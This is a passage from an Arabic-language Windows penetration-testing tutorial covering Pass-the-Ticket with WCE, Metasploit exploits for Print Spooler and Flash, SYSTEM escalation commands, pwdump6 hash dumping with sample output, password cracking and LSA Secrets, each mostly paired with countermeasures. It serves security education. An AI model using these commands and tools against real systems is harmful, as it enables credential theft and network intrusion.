الـ MFA مش هتمنع PtH، لكنها هتمنع الاستغلال في خدمات معينة زي:
• Outlook / OWA
• VPN Gateways
• RDP Gateway
لو مربوطة بـ Azure AD مثلا.
⚔️ 7. الحماية الهجومية (Honeytokens / Deception)
✅ حط حساب Domain Admin وهمي (Honey Admin)
✅ اربطه بـ alert فوري لو حد حاول يستخدمه
✅ ممكن تحط ملفات LSASS bait على أجهزة معينة عشان ترصد أي محاولة dump
‼️ هجوم "Pass the Ticket" في Kerberos – إزاي المهاجم يدخل من غير ما يكسر باسورد!
أول حاجة لازم نفهمها هو إن نظام Kerberos هو نظام توثيق (Authentication) بيستخدمه ويندوز في الشبكات، خصوصًا في بيئات الـDomain. الفكرة ببساطة إنك لما بتسجل دخول (Logon) على الجهاز، بتاخد حاجة اسمها TGT (Ticket Granting Ticket) من سيرفر اسمه KDC (Key Distribution Center) وده جزء من الـDomain Controller.
بعد كده، لما تحاول تدخل على أي خدمة أو سيرفر تاني، بتستخدم الـTGT عشان تطلب تذاكر جديدة تقدر توصلك للخدمة اللي عايزها – زي إنك معاك كارنيه (TGT)، وبتستخدمه تاخد تصاريح دخول (Tickets) لأماكن مختلفة في الشركة.
‼️ الـ Pass the Ticket – اللعب على طريقة الهاكرز
فيه هجوم اسمه Pass-the-Ticket (PtT)، وده شبه هجوم تاني مشهور اسمه Pass-the-Hash، لكن بدل ما يستخدموا Hash الباسورد، هنا المهاجم بيستخدم تذاكر Kerberos الجاهزة، ويعيد استخدامها كأنها بتاعته.
يعني لو الهاكر قدر يوصل لجهاز شخص سجل دخوله قبل كده، يقدر "يسحب" منه التذاكر اللي موجودة في الذاكرة، وياخد كمان الـTGT، ومن هنا يبدأ يتنطط على الشبكة كلها بدون ما يحتاج يعرف أي باسورد!
‼️ الأدوات اللي بيستخدموها في الهجوم
فيه أداة قوية اسمها Windows Credentials Editor (WCE)، واللي طورتها شركة اسمها Amplia Security، الأداة دي بتسمح للمهاجم يعمل الآتي:
🔸 يسحب التذاكر (Kerberos tickets) من الذاكرة.
🔸 يحفظها في ملفات بصيغة مناسبة.
🔸 ينقلها لجهاز تاني.
🔸 يحمل التذاكر دي على جهازه ويستخدمها كأنها بتاعته.
مثال عملي للهجوم
بعد ما المهاجم يسيطر على جهاز (وليكن عن طريق استغلال ثغرة أو Social Engineering)، بيشغل WCE كده:
C:\Tools>wce.exe -K
وبتظهرله الرسالة دي:
Converting and saving TGT in UNIX format to file wce_ccache...
Converting and saving tickets in Windows WCE Format to file wce_krbtkts..
6 kerberos tickets saved to file 'wce_ccache'.
6 kerberos tickets saved to file 'wce_krbtkts'.
Done!
كده معاه ملفين فيهم التذاكر.
يروح على جهازه، ويحمل التذاكر دي:
C:\Tools >wce -k
ويلاقي:
Reading kerberos tickets from file 'wce_krbtkts'...
6 kerberos tickets were added to the cache.
Done!
بكده يقدر يستخدم أوامر زي net.exe أو حتى يفتح الـWindows Explorer ويدخل على سيرفرات تانية، كأنه الشخص الحقيقي، من غير ما يكسر باسورد واحد!
الخطر هنا مش بس إن المهاجم دخل، الخطر الحقيقي إنه داخل بتذكرة شرعية، معتمدة من KDC، فالسيرفرات التانية مش هتشُك فيه أصلًا!
كأنه لابس لبس الموظفين ودخل من الباب الرئيسي… من غير ما حد يقوله “أنت مين؟”
‼️ الهجمات من غير توثيق – Remote Unauthenticated Exploits
بعيد عن موضوع التذاكر والتوثيق، فيه نوع تاني من الهجمات اسمه Remote Unauthenticated Exploits، وده مش محتاج أي يوزر أو باسورد. المهاجم هنا بيستغل ثغرات في برامج الويندوز نفسها أو إعدادات غلط.
في البداية، النوع ده كان بيركز على الخدمات اللي بتتعرض للإنترنت زي بروتوكولات TCP/IP. لكن دلوقتي الهجمات دي بقت تستهدف حاجات تانية زي:
🔸 تعريفات الهاردوير (Driver Interfaces)
🔸 وسائل الاتصال والتخزين (Media Interfaces)
برامج مشهورة بتشتغل عند المستخدم العادي زي:
🔸 Microsoft Office
🔸 Internet Explorer
🔸 Adobe Acrobat Reader
الهجمات دي خطيرة لأنها بتخلي المهاجم يدخل من غير ما يكون فيه أي توثيق – مفيش باسورد، مفيش يوزر، مفيش تنبيه!
‼️ الخلاصة
هجوم "Pass-the-Ticket" هو واحد من أخطر الأساليب اللي بتستخدم التذاكر الشرعية ضد الشبكة نفسها. المهاجم مش بيكسر الباسورد… هو ببساطة بيسرق كارت التصريح وبيستخدمه.
فكر فيها كأنك سايب كارت الشركة بتاعك على المكتب، وحد تاني خده واستخدمه يدخل أي مكان من غير ما حد ياخد باله.
‼️ الـ Network Service Exploits – استغلال خدمات الشبكة
مقدمة:
بص يا سيدي، استغلال خدمات الشبكة كان زمان هو العِماد الأساسي في الهاكينج بتاع ويندوز. أيامها كان الهاكر يقعد يلف النت يدور على إكسبلويت مكتوبة من ناس في بلاد الله الواسعة، ويقعد بالساعات يظبط الكود اللي عادة بيكون مزاجي جدًا، علشان يشغله على هدفه.
دلوقتي؟ الدنيا اختلفت. بقيت الموضوع بسيط لدرجة إنك تقدر تهكّر بنظام "دوسة زرار"، بفضل أدوات زي Metasploit. الأداة دي مش بس مشهورة، لكن كمان فيها نسخة مجانية عكس حاجات تانية مدفوعة، وبتقدّم مكتبة محترمة من الإكسبلويتس الجاهزة.
يعني من الآخر، بدل ما كنت زمان بتكتب كود اختراق وأنت بتسمع أم كلثوم، دلوقتي ممكن تختَرق جهاز وإنت بتشرب نسكافيه ومستني تحميل اللعبة.
مثال عملي: استغلال ثغرة Print Spooler
خلينا ندي مثال عملي على ده. هنستخدم النسخة اللي فيها GUI من Metasploit علشان ننفّذ هجوم على ثغرة موجودة في خدمة Print Spooler على Windows XP SP3. والثغرة دي مش أي ثغرة... دي كانت واحدة من اللي استخدمها فيروس Stuxnet، اللي اتقال إنه استُخدم لضرب مفاعل نووي إيراني.
الثغرة بتشتغل إزاي؟ الجهاز اللي بيشارك طابعة على الشبكة بيعرض خدمة Print Spooler عن طريق RPC. لما تبعتله طلب طباعة معمول بطريقة معينة، من غير ما السيستم ياخد باله، بيسمحلك تكتب ملف في مجلد السيستم بتاع الويندوز. ومن هنا، تبدأ تلعب شوية ألعاب حلوة وتنتهي بتشغيل كود بصلاحيات SYSTEM.
يعني تخيل معايا، بتبعتله طلب طباعة، والجهاز بدل ما يطبع، يفتحلك الباب الخلفي يقولك "اتفضل، البيت بيتك".
‼️ خطوات تنفيذ الإكسبلويت باستخدام Metasploit
في Metasploit GUI، كل اللي بتعمله إنك تفتح الأداة، وتدوّر على كلمة "ms10" – هتلاقي كل الثغرات اللي اتسجّلت في 2010 من مايكروسوفت. بتختار الموديول windows/smb/ms10_061_spoolss. تفتحلك نافذة تقدر منها تحدد إعدادات الإكسبلويت زي آي بي الضحية، نوع الحمولة اللي هتشغلها (تضيف يوزر؟ تفتح شيل؟ تحقن كود؟)... كل اللي نفسك فيه.
بعد ما تخلص الإعدادات، تدوس "Run in Console"... وتستنى. لو كل حاجة ماشية صح، هيجيلك جلسة Meterpreter بصلاحيات SYSTEM على جهاز الضحية. وساعتها، أنت المتحكم في السيستم بالكامل.
يعني ببساطة، حولت جهاز الضحية لـ ريموت كنترول، وانت اللي معاك الريموت.
‼️ الـ Network Service Exploit Countermeasures – الحماية من استغلال خدمات الشبكة
خطوات الحماية
أول نصيحة وأهم نصيحة: نزّل الباتش أول ما ينزل.
مايكروسوفت عندها النشرة MS10-061 اللي بتشرح تفاصيل الثغرة دي. لكن في الوقت اللي الباتش لسه ما اتطبّقش فيه، تقدر تلجأ لشوية حلول مؤقتة:
🔸 اقفل البورتات اللي بتُستخدم في الهجوم (TCP 135–139 و445، UDP 135–138، إلخ).
🔸راقب الشبكة، فعل الـ logging، وشوف مين بيكلم مين وبيحاول يدخل على إيه.
🔸 ابقى جاهز بخطة استجابة للحوادث لو الدنيا ولعت.
بس خلي بالك، الحل بتاع قفل البورتات ممكن مايبقاش عملي في كل الحالات، لإن ويندوز بيستخدم البورتات دي في خدمات تانية كتير. الحل ده بينفع أكتر مع السيرفرات اللي على الإنترنت، مش الشبكات الداخلية.
وفعلًا، لو الشبكة بتاعتك مفتوحة على كل بورتات الـ RPC، فده كأنك سايب شباك أوضتك مفتوح وبتستغرب ليه الناموس دخل.
‼️ المراقبة والاستجابة
مش ناسيين طبعًا موضوع المراقبة المستمرة، اللي بيساعدك تكتشف أي محاولة اختراق بدري، وتتحرك بسرعة قبل ما الضرر يحصل. مهم كمان إنك يكون عندك خطة واضحة تستجيب بيها بسرعة لأي تهديد يظهر.
‼️ خاتمة
استغلال خدمات الشبكة لسه موجود وفعّال، حتى لو بقى يعتبره البعض "قديم الطراز". لكن طالما الثغرات بتظهر، والأدوات بتتطور، فالمهاجمين هيكملوا يستغلوها. الحل؟ إنك دايمًا تكون سابق بخطوة: باتش بسرعة، راقب كويس، وكن جاهز تتصرف وقت اللزوم.
وفاكر دايمًا: الحماية مش معناها إنك تقفل كل حاجة وتطفي النت، لكن إنك تفهم إزاي الدنيا بتشتغل، وتتعامل مع المخاطر قبل ما تبقى مصايب. لأن في النهاية، الهاكر مش بينام... فليه انت تنام وانت سايب الباب مفتوح؟
‼️ الـ End-User Application Exploits – استغلال تطبيقات المستخدم النهائي
لو سألت أي هاكر محترف: "إيه أضعف نقطة في النظام؟" هيقولك بثقة: المستخدم! سواء كان مشغّل فلاش، بيفتح ملفات أوفيس، أو بيشرب شاي قدام الجهاز – هو دا الهدف.
الهاكر بيحب تطبيقات المستخدم العادي لأنها غالبًا مش بتتراجع كويس، ولا بتتحدّث بسرعة، وكمان بتتعامل مع بيانات المستخدم مباشرة – يعني الدخول على كنز بدون حفر. كمان كان زمان التركيز كله على سيرفرات الشركات، لكن دلوقتي التطبيقات اللي عند المستخدم العادي بقت هي ساحة اللعب.
❇️ مثال: Adobe Flash Player
لو فيه تطبيق أخد نصيبه من حب الهاكرز، فهو Adobe Flash Player. التطبيق ده كان بيُستخدم لتشغيل الفيديوهات والأنيمشن أونلاين – بس من كتر ما هو منتشر، بقى هدف سهل.
لو فتحت قاعدة بيانات الثغرات (NVD) ودورت على "adobe flash" بين 2008 و2011 هتلاقي فوق 160 نتيجة. والمضحك إن العدد اتضاعف بين 2009 و2010... كأن الهاكرز عملوا مؤتمر واتفقوا عليه.
طبعًا Metasploit ما بتفوتش حاجة، وأول ما ثغرة بتنزل لفلاش، تلاقيها مضافة في الأداة، وجاهزة لتجربتها بزرار واحد – زي ما عملنا مع Print Spooler.
‼️ خطوات الاستغلال باستخدام Metasploit
افتح Metasploit، دور على "adobe flash"، هتلاقي مجموعة Modules جاهزة. تقدر تختار حمولة (Payload) زي Remote Shell أو حتى تنضيف مستخدم جديد. الإعداد بسيط والنتيجة؟ غالبًا هتحصل على جلسة تحكم في جهاز الضحية.
يعني من الآخر، بتبعتله ملف HTML فيه الكود الشرير، الضحية يفتحه وهو فاكر نفسه بيشوف فيديو قطط، وتلاقي نفسك فاتح سيستم الجهاز عنده!
End-User Application Exploit Countermeasures – الحماية من استغلال تطبيقات المستخدم
نصائح عامة
أبسط طريقة تحمي نفسك؟ ما تنزلش Flash أصلاً 😄 بس لو محتاجه، يبقى لازم تطبّق الآتي:
🔸 استخدم أداة EMET من مايكروسوفت (Enhanced Mitigation Experience Toolkit). دي بتضيف طبقات حماية لتطبيقاتك.
🔸 نزّل التحديثات أول بأول، وخلي التحديثات التلقائية شغالة.
🔸 شغّل برنامج Antivirus، وكمان برامج Antispyware وAntiphishing.
🔸 غيّر إعدادات المتصفح (Internet Options) وخلّيها مشددة شوية.
🔸 بلاش تفتح الجهاز بـ Administrator، واستخدم صلاحيات محدودة.
🔸 لو تقدر، شغّل المتصفح في Virtual Machine – حيطين حماية على قد ما تقدر.
🔸لو إنت مسؤول عن شبكة، نفّذ نفس الإجراءات على مستوى الشبكة.
🔸 افتح الإيميلات كـ Plain Text، وخلّي الماكروز في Office على أعلى مستوى حماية.
🔸 خليك شاكك دايماً أي رابط مش واضح، تجاهله فورًا.
وأخيرًا: خليك ماسك في جهازك كويس – لو حد سرقه، كله راح.
مثلاً كأنك بتقول:
تخيل إنك داخل على موقع علشان تتفرج على فيديو "أفضل 10 طرق لتهدي القطة وهي بتصرخ"، وفجأة... القطة فعلاً تهدى، بس جهازك يسخن. وتكتشف إن الفيديو كان مجرد ستار لثغرة Flash حملت Shell على جهازك. آه والله.
‼️ خاتمة
تطبيقات المستخدم النهائي هي ملعب الهاكرز دلوقتي، مش بس علشان فيها ثغرات، لكن كمان علشان المستخدم نفسه بيكون مطمن وبيفتح أي حاجة. فلو عايز تحمي نفسك: خليك واعي، حدث تطبيقاتك، وشغّل الحماية على طول الخط.
‼️ Device Driver Exploits – استغلال تعريفات الأجهزة
محدش كتير بيفكر في تعريفات الأجهزة كهدف سهل للاختراق، بس الحقيقة إنها من أكتر الحاجات اللي بتفتح ثغرات في السيستم، وساعات بتبقى أخطر كمان من استغلال خدمات الشبكة. فيه بحث نزل سنة 2006 من Johnny Cache وHD Moore وskape، وورونا فيه إزاي درايفرات الواي فاي ممكن تتخترق لمجرد إن جهازك يكون قريب من Access Point بيبث باكيتات خبيثة.
التعريفات دي أغلبها مش من مايكروسوفت، لكن الكارثة إن النظام نفسه مش بيحميك كويس ضد النوع ده من الهجمات. يعني مايكروسوفت بتفخر بميزة "plug and play"، بس الحقيقة إن كل تعريف جديد بيتسطب بيزوّد مساحة الهجوم بشكل كبير. من أول كارت الشبكة، للبلوتوث، للديفيدي، كلهم بيستقبلوا بيانات من برا.
✨ المشكلة الأكبر
الكرسي في الكلوب؟ إن أي ثغرة في Driver ممكن تؤدي لتنفيذ كود في وضع الـ kernel يعني كأنك إديت الهـاكر مفتاح السيستم بنفسك. Driver واحد ملغم كفاية يخلّي جهازك يترنح.
HD Moore كتب Exploit لـ Metasploit بيستهدف درايفرات واي فاي من Broadcom وD-Link وNetgear. الإكسبلويت كان بيبعت باكيت واي فاي ضخمة (Beacon) تبوظ الدرايفر وتخلّي المهاجم ينفذ كود على مستوى الـ kernel. يعني أي لابتوب عنده كارت Netgear قديم وفي وضع مش متصل، ممكن يتخترق لمجرد إنه شايف الشبكة.
المرة الجاية وإنت ماشي في مول أو مطار وشايف شبكات واي فاي كتير، افتكر إن أي واحدة منهم ممكن تكون بتحاول تروتك.
🔵 حماية ضد استغلال التعريفات
نصائح سريعة
🔹 أول وأهم خطوة: نزل التحديثات بتاعة التعريفات أول بأول من الشركة المصنعة.
🔹 في الأماكن اللي فيها Access Points كتير، اقفل الواي فاي وانت ماشي – معظم اللابتوبات فيها زرار بيعمل كده.
🔹 نظام التشغيل الحديث بقى بيدعم Driver Signing – يعني مينفعش درايفر يتسطب من غير ما يكون موقع بشهادة.
🔹 بس خد بالك، التوقيع مش معناه إن الكود آمن 100% – ممكن يفضل فيه ثغرات.
‼️ المستقبل: UMDF
مايكروسوفت بتطوّر إطار اسمه User-Mode Driver Framework (UMDF)، وده بيخلّي الدرايفر يشتغل بصلاحيات قليلة (user mode) بدل ما يدخل مباشرة في kernel mode. الفكرة إن حتى لو في ثغرة، الضرر هيبقى أقل بكتير.
‼️ Privilege Escalation – تصعيد الصلاحيات
بعد ما الهاكر يخترق الجهاز، بيبدأ يدور على طريقة يزوّد بيها صلاحياته ويخش كـ Administrator أو حتى SYSTEM.
واحد من أشهر الثغرات كان getadmin – ده exploit قديم ظهر مع Windows NT4 وكان بيستخدم DLL Injection علشان ياخد صلاحيات أعلى. تم ترقيعه زمان، بس الطريقة نفسها لسه بتشتغل بأشكال تانية.
طرق تقليدية للوصول لـ SYSTEM:
باستخدام Windows Scheduler:
C:\>at 14:53 /INTERACTIVE cmd.exe
أو بأداة psexec المجانية من Sysinternals:
psexec -i -s cmd.exe
الحماية من تصعيد الصلاحيات
🔹نزّل التحديثات أول بأول – الثغرات دي بتتعالج من جذورها بالكود.
🔹قلّل من عدد الناس اللي يقدروا يعملوا Interactive Logon، خصوصًا على السيرفرات أو الأجهزة اللي فيها داتا حساسة.
🔹استخدم Group Policy علشان تتحكم في مين يقدر يفتح الجهاز محليًا.
🔹وفكّر دايمًا في عزل أي تطبيق ممكن يشكل خطر، خصوصًا التصفح والإيميلات.
‼️ Extracting and Cracking Passwords – سحب وكسر كلمات السر
أول ما المهاجم يوصل لـ Admin، بيبدأ يدور على باقي حسابات الشبكة.
هدفه؟ يجيب أكبر عدد من الـ credentials علشان يتوسع أكتر في الشبكة.
بعض الأدوات بتشتغل بسهولة أكتر لما يكون الـ Windows Firewall مقفول – وده اللي بيحصل غالبًا أول خطوة بعد الاختراق.
‼️ خاتمة
استغلال الدرايفرات بيبان أحيانًا حاجة ثانوية، بس في الواقع هو كأنك بتفتح الباب الخلفي لأي مهاجم. الدرايفر بيشتغل في مستوى منخفض جدًا، وأي ثغرة فيه ممكن تدي صلاحيات كاملة.
علشان كده لازم نتابع التحديثات، نقلل الصلاحيات، ونفهم إن كل قطعة هاردوير وراها سطر كود – والسطر ده ممكن يبقى مدخل لهجوم كامل.
Audio
بودكاست بين AI و AI لشرح جمع المعلومات 😂
‼️ Grabbing the Password Hashes – لما الأدمنية تقع في شر أعمالها
أول ما الهاكر يوصل لصلاحيات أدمن، غالبًا مش هيفكر كتير وهيجري فورًا على الهدف الكبير: Password Hashes – أو بمعنى تاني، المفاتيح السرية اللي بتفتحله أبواب بقية الأجهزة.
في أنظمة ويندوز، الهاشات دي بتتخزن في مكانين:
🔸 ملف SAM على الأجهزة العادية (stand-alone machines).
🔸 Active Directory على أجهزة الـ Domain Controller.
ملف الـ SAM ده فيه أسماء المستخدمين وكمان كلمات السر بس مش كده صريحة، لأ، دي مشفرة على هيئة hashes. تخيل كأنك بتحاول تعرف مكونات طبق كشري من صورته بس.
الغريب بقى؟ إن حتى لو الجهاز مش مربوط بالدومين، ممكن تلاقي فيه معلومات تفتحلك دومين تاني، خصوصًا لو الناس – كعادة البشر – بيستخدموا نفس الباسورد في كل حتة. ودي كارثة أمنية بمعنى الكلمة.
‼️ مكان تخزين الهاشات
🔸 في الأجهزة العادية:C:\Windows\System32\config\SAM (ملف مغلق طول ما الجهاز شغال)
🔸 في الـ Domain Controllers:%windir%\NTDS\ntds.dit
وملف الـ SAM كمان متسجل كـ Hive في الـ Windows Registry تحت:HKEY_LOCAL_MACHINE\SAM
بس للأسف حتى الأدمن مش يقدر يدخل عليه بسهولة، لكن زي ما بنقول في مصر: "اللي عايز يعمل حاجة هيعملها"، يعني بشوية فهلوة وشوية Scheduler service، المهاجم يقدر يوصل.
‼️ استخراج الهاشات باستخدام أدوات متخصصة
في أدوات كتير بتساعد في الموضوع ده، أشهرها عيلة برامج pwdump، وهي أدوات بتعمل حاجة واحدة، بس بتعملها بإتقان: تسحب الهاشات من الـ Registry وتحولها لملف تقدر تحلله براحتك.
البرنامج الأساسي اسمه pwdump وبدأ مع Jeremy Allison، وبعده جه ناس كتير طوروه:
🔸pwdump2
🔸pwdump3e
🔸pwdump6
وكلهم بيشتغلوا بنفس الفكرة: DLL Injection – يعني يدخلوا نفسهم جوه عملية شغالة بصلاحيات عالية (زي lsass.exe) وياخدوا اللي عايزينه.
وفي أداة كمان لطيفة اسمها fgdump، بتلف على الأدوات دي وتستخرج الهاشات من الأجهزة البعيدة كمان (Remote Dumping) وتطلعلك كنز الـ credentials.
⁉️ ملاحظة: النسخ القديمة زي pwdump2 مش هتشتغل على Windows Vista وما بعدها، عشان LSASS بقى في مكان مختلف.
🔸 مثال واقعي باستخدام pwdump6
هنا تجربة على سيرفر Windows Server 2008:
D:\Tools>PwDump.exe -u Administrator -p password 192.168.234.7
pwdump6 Version 2.0.0-beta-2 by fizzgig and the mighty group at foofus.net
THIS IS A BETA VERSION! YOU HAVE BEEN WARNED.
...
Administrator:500:NO PASSWORD*********************:3B2F3C28C5CF28E46FED883030:::
krbtgt:502:NO PASSWORD*********************:55FFCA43B26B3F1BE72DBAA74418BCFD:::
George:1102:NO PASSWORD********************* :D67FB3C2ED420D5F835BDD86A03A0D95:::
...
Completed.
تلاحظ إن العمود التالت فيه NO PASSWORD – وده معناه إن السيرفر مش بيخزن LM Hash (وده نوع ضعيف جدًا من الهاشات)، ودي حاجة كويسة أمانًا، بس لسه الـ NTLM موجود، ولسه فيه خطر.
‼️طب نأمن نفسنا ازاي؟ (pwdump Countermeasures)
طالما DLL Injection لسه شغال في ويندوز، يبقى مفيش حماية حقيقية ضد أدوات pwdump. بس في عز العتمة فيه نقطة نور: الأداة دي محتاجة صلاحيات أدمن. فلو الهاكر وصل للمرحلة دي، غالبًا هو خلاص عمل اللي هو عايزه.
لكن المشكلة بتيجي بعد كده: المهاجم ممكن ياخد الهاشات دي ويهاجم بيها أجهزة تانية، يدخل على دومينات تانية، أو يشتغل بيها في هجمات Pass-the-Hash.
يعني الموضوع مش بيقف عند جهاز واحد، لأ... ده عامل زي لمبة النور اللي اتحرقت في أوضة، بس الكهربا اتقطعت عن العمارة كلها.
‼️ الخاتمة
الوصول للـ Password Hashes في ويندوز مش بس مرحلة متقدمة في الاختراق، ده تقريبًا الكنز الحقيقي. سواء من خلال ملف الـ SAM أو Active Directory، الهاكر اللي يوصل للهاشات يقدر يعمل مصايب كتير، خاصة لو المستخدمين بيكرروا الباسوردات.
استخدام أدوات زي pwdump بيخلي العملية سهلة وخطيرة في نفس الوقت، خصوصًا مع غياب الحماية الكاملة ضد أساليب الـ DLL Injection. عشان كده أهم نقطة دفاع حقيقية هي إنك تمنع من الأساس إن المهاجم ياخد صلاحيات أدمن. ولو حصل... يبقى ربنا يستر.
😂 ودايمًا نفتكر: ما تكتبش باسوردك "123456"، حتى لو نفسك تعملها علشان تفتكره... متبقاش طيب!
‼️ لما الباسورد يعطل (Cracking Passwords)
تخيل معايا كده، الهاكر مسك في إيده الهاشات بتاعة الباسوردات بتاعتك. يعني مش الباسوردات نفسها، بس نسخ مشفّرة منها. تفتكر كده خلاص؟ لا، ده مجرد البداية.
زمان لما كنا بنقرأ كتب التشفير، كانوا بيقولوا إن الـ هاش (Hash) عملية تشفير في اتجاه واحد، يعني مفيش رجوع، بس الحقيقة؟ فيه طرق تتحايل على النظام. الموضوع اسمه كده في الدوائر الهاكرية: كسر الباسوردات - Password Cracking.
ببساطة، ده محاولة لتخمين الباسوردات الحقيقية من الهاشات اللي مع الهاكر، بس من غير ما يدخل كلمة السر جوه النظام. العملية بتبقى أوفلاين، بعيد عن عين السيستم، عشان مفيش بقى محاولات غلط وتتعطل الحساب. كده كده الهاكر بيشتغل على نسخة مسروقة من الهاشات، ويفضل يجرب لحد ما يلاقي واحدة تطابق.
‼️ الضعف مش فيك.. في الخوارزمية
الموضوع بيبدأ بخوارزمية الهاش نفسها. يعني النظام اللي بيحول الباسورد لـ hash.
خد عندك مثلًا خوارزمية اسمها LAN Manager Hash - أو LM Hash. دي خوارزمية قديمة، وفضايحها في التسريبات مش بتخلص. الباسورد فيها بيتقسم لنصين، كل واحد 7 حروف، وكمان بيتحول لحروف كابيتال. يعني لو كنت عامل باسورد محترم 14 حرف، النظام بياخده على قد عقله ويقطعه في النص، ويهزر معاك.
النتيجة؟ عدد الاحتمالات بيقل جامد، وكأنك فتحت الباب للهاكر يقولك: “اتفضل خش”. الباسوردات اللي معمولة بنظام LM ممكن تتكسر في ثواني. وعلشان كده، مايكروسوفت قالت كفاية كده، وشالت النظام ده في الإصدارات الجديدة.
أما بقى NTLM Hash، الخوارزمية الجديدة، فصعب شوية. لو الناس ملتزمة بقواعد كويسة في اختيار الباسورد – زي طول مناسب، وحروف وأرقام – تبقى محاولة كسره بالنّظر بس، مالهاش لازمة.
بس حتى كده، الهاشات دي فيها عيب كبير: مفيهاش Salt.
⁉️ هو إيه الـ Salt ده يا عم؟
السولت (Salt) ببساطة هو شوية بهارات عشوائية بتتحط على الباسورد قبل ما يتعمل له هاش، علشان لو اتكرر نفس الباسورد عند أكتر من حد، ما يطلعوش بنفس النتيجة.
كتير من أنظمة التشغيل بتحط السولت جنب الهاش عشان تقدر تراجع الباسورد بعدين. بس ويندوز؟ لأ، مايكروسوفت كانت شايفة إن تقوية الخوارزمية نفسها أهم، وقالت "نشتغل بالعضل".
المشكلة بقى؟ إن من غير سولت، ينفع تجهز Rainbow Tables، اللي هي جداول ضخمة فيها هاشات جاهزة لباسوردات كتير، وتستخدمها في المقارنة مباشرة، من غير ما تضطر تولّد كل مرة من جديد. يعني هاكر مجهز جدول كأنك عامل غش في الامتحان، أول ما يشوف الهاش، يطلعه من الجدول.
الذكاء الاصطناعي؟ لأ.. الذكاء الكسول!
دلوقتي نخش على الطرق اللي بيستخدمها الهاكر عشان يكسر الهاش.
🔸 الطريقة الأولى هي القاموس – Dictionary Attack، ودي بتاخد لستة كلمات، ممكن تكون كلمات إنجليزية، أسماء، شتايم، أي حاجة، وتحولها لهاش، وتشوف تطابق مين.
🔸الطريقة التانية، اللي بتحتاج وقت وجهد أكتر، هي Brute Force – الهجوم العنيف، وده بيجرب كل الاحتمالات، من أول "aaa" لحد "zZz#123!"… وكل ده على أمل يلاقي تطابق.
بس فيه ناس بتاخد الطريق النص، وتضيف أرقام أو رموز على كلمات القاموس، زي "password123" أو "admin2024"، ودي للأسف شائعة جدًا عند المستخدمين الكسالى.
في سنة 2003، باحث اسمه "Philippe Oechslin" قرر يقولنا: “أنا عامل جدول فيه كل الهاشات الممكنة لباسوردات LM”، وكل ده قبل حتى ما الهاكر يبدأ شغله.
الجدول ده اسمه Rainbow Table، وده عبارة عن جداول ضخمة جدًا فيها ملايين ومليارات الهاشات، عشان الهاكر بدل ما يولد هاش جديد كل مرة، بس يقارن الهاش اللي معاه بواحد جاهز في الجدول.
كان فيه مشروع شهير اسمه Project RainbowCrack بيبيع الجداول دي على DVD بـ 120 دولار، وأنت وحظك بقى. وطبعًا عشان مفيش سولت، الجداول دي فعالة جدًا.
لو دخلت عالم كسر الباسوردات، هتلاقي أدوات كتير بتلعب في المنطقة دي. أشهرهم:
🔸 John the Ripper: ده سطر أوامر، بيكسر LM وNTLM وبيشتغل بسرعات محترمة. ممكن تديه ملف فيه هاشات، وهو يقولك "ثانية واحدة.. أهو".
🔸 Cain & Abel: برنامج مشهور جدًا، بيعمل كل حاجة من الهجمات العنيفة لحد تحليل الـ challenge-response اللي بتتشاف في الشبكات.
🔸 LCP: واجهة رسومية سهلة، بتشتغل على LM وNTLM، وتقدر تضيف قاموس مخصوص وتحاول تكسر بيه الهاشات.
🔸 Ophcrack: بيشتغل مباشرة مع جداول الـ Rainbow، وبيخلي الموضوع كأنه لعبة مطابقة صور.
وفيه أدوات احترافية زي بتاعة Elcomsoft، اللي بتوزع الكراكينج على آلاف الأجهزة، وبتستخدم كروت الشاشة (GPU) عشان تسرّع الشغل 50 مرة أكتر.
‼️ طب الموضوع ده بياخد وقت قد إيه؟
على حسب! لو بتتعامل مع LM Hash، الموضوع ممكن يخلص في دقايق (أو حتى ثواني). بس لو NTLM، الموضوع بيختلف تمامًا.
✨ التقديرات بتقول إنه لو حاولت تكسر باسورد من 128 حرف كاملين باستخدام NTLM، أنت محتاج وقت أطول من عمر الكون نفسه. بس طبعًا محدش بيكتب باسورد 128 حرف، لأن دماغ البني آدم مش فلاش ميموري.
المشكلة؟ الناس بتختار باسوردات سهلة: اسم القطة، تاريخ الميلاد، أو كلمة “Password” بحرف كبير. فحتى لو الخوارزمية قوية، الباسورد نفسه ضعيف، وسهل يتكسر.
الهاكر الشاطر مش بيكسر الباسورد بقوته، بيكسره بفهمه. وكل الثغرات اللي اتكلمنا عنها، هي فرص ليه يفتح الباب. ومن ناحيتنا، كمدافعين أو فاهمين في السيكيورتي، لازم نكون عارفين الطرق والأساليب دي كويس.
الهاشات مش نهاية القصة، دي مجرد بداية فيلم الأكشن.
المشكلة؟ الناس بتختار باسوردات سهلة: اسم القطة، تاريخ الميلاد، أو كلمة “Password” بحرف كبير. فحتى لو الخوارزمية قوية، الباسورد نفسه ضعيف، وسهل يتكسر.
‼️ الخاتمة: الفهلوة مش كفاية
الهاكر الشاطر مش بيكسر الباسورد بقوته، بيكسره بفهمه. وكل الثغرات اللي اتكلمنا عنها، هي فرص ليه يفتح الباب. ومن ناحيتنا، كمدافعين أو فاهمين في السيكيورتي، لازم نكون عارفين الطرق والأساليب دي كويس.
الهاشات مش نهاية القصة، دي مجرد بداية فيلم الأكشن.
لما الباسورد مايموتش... حتى بعد ما تقفله! 🧠
الموضوع هنا مش بس إنك تسحب الهاشات من SAM أو NTDS، لأ، في بلاوي تانية بيخزنها Windows في أماكن مالهاش دعوة مباشرة بملف الباسوردات الأساسي. يعني لو حصلت على صلاحيات أدمن؟ فيه أماكن تانية تقدر تسحب منها بيانات حساسة جدًا – من غير ما الناس تحس.
LSA Secrets – الكنز المخفي في الريجيستري 🔐
واحدة من أخطر وأغرب الخبايا في Windows هي حاجة اسمها LSA Secrets. دي منطقة في الريجيستري (Registry) بتخزن بيانات حساسة جدًا، وممكن أي حد عنده صلاحيات SYSTEM أو Administrator يقرأها.
المكان ده في الريجيستري:
HKLM\SECURITY\Policy\Secrets
وبيخزن حاجات زَيّ:
🔸 باسوردات حسابات الخدمات (Service Accounts) بشكل نصي صريح – Plaintext! 😱
🔸 هاشات لآخر 10 مستخدمين عملوا تسجيل دخول.
🔸 بيانات الدخول لحسابات FTP أو مواقع الويب.
🔸 بيانات الاتصال عن بُعد (RAS Dial-up).
🔸 باسوردات حسابات الأجهزة في الدومين.
يعني باختصار: لو قدرت توصل للـ LSA Secrets، ممكن تمسك طرف خيط يخليك تخرم الشبكة كلها، خصوصًا لو فيه حسابات خدمات بتشتغل بصلاحيات دومين.
مثال عملي: إزاي ممكن LSA Secrets تدمّر دومين بالكامل
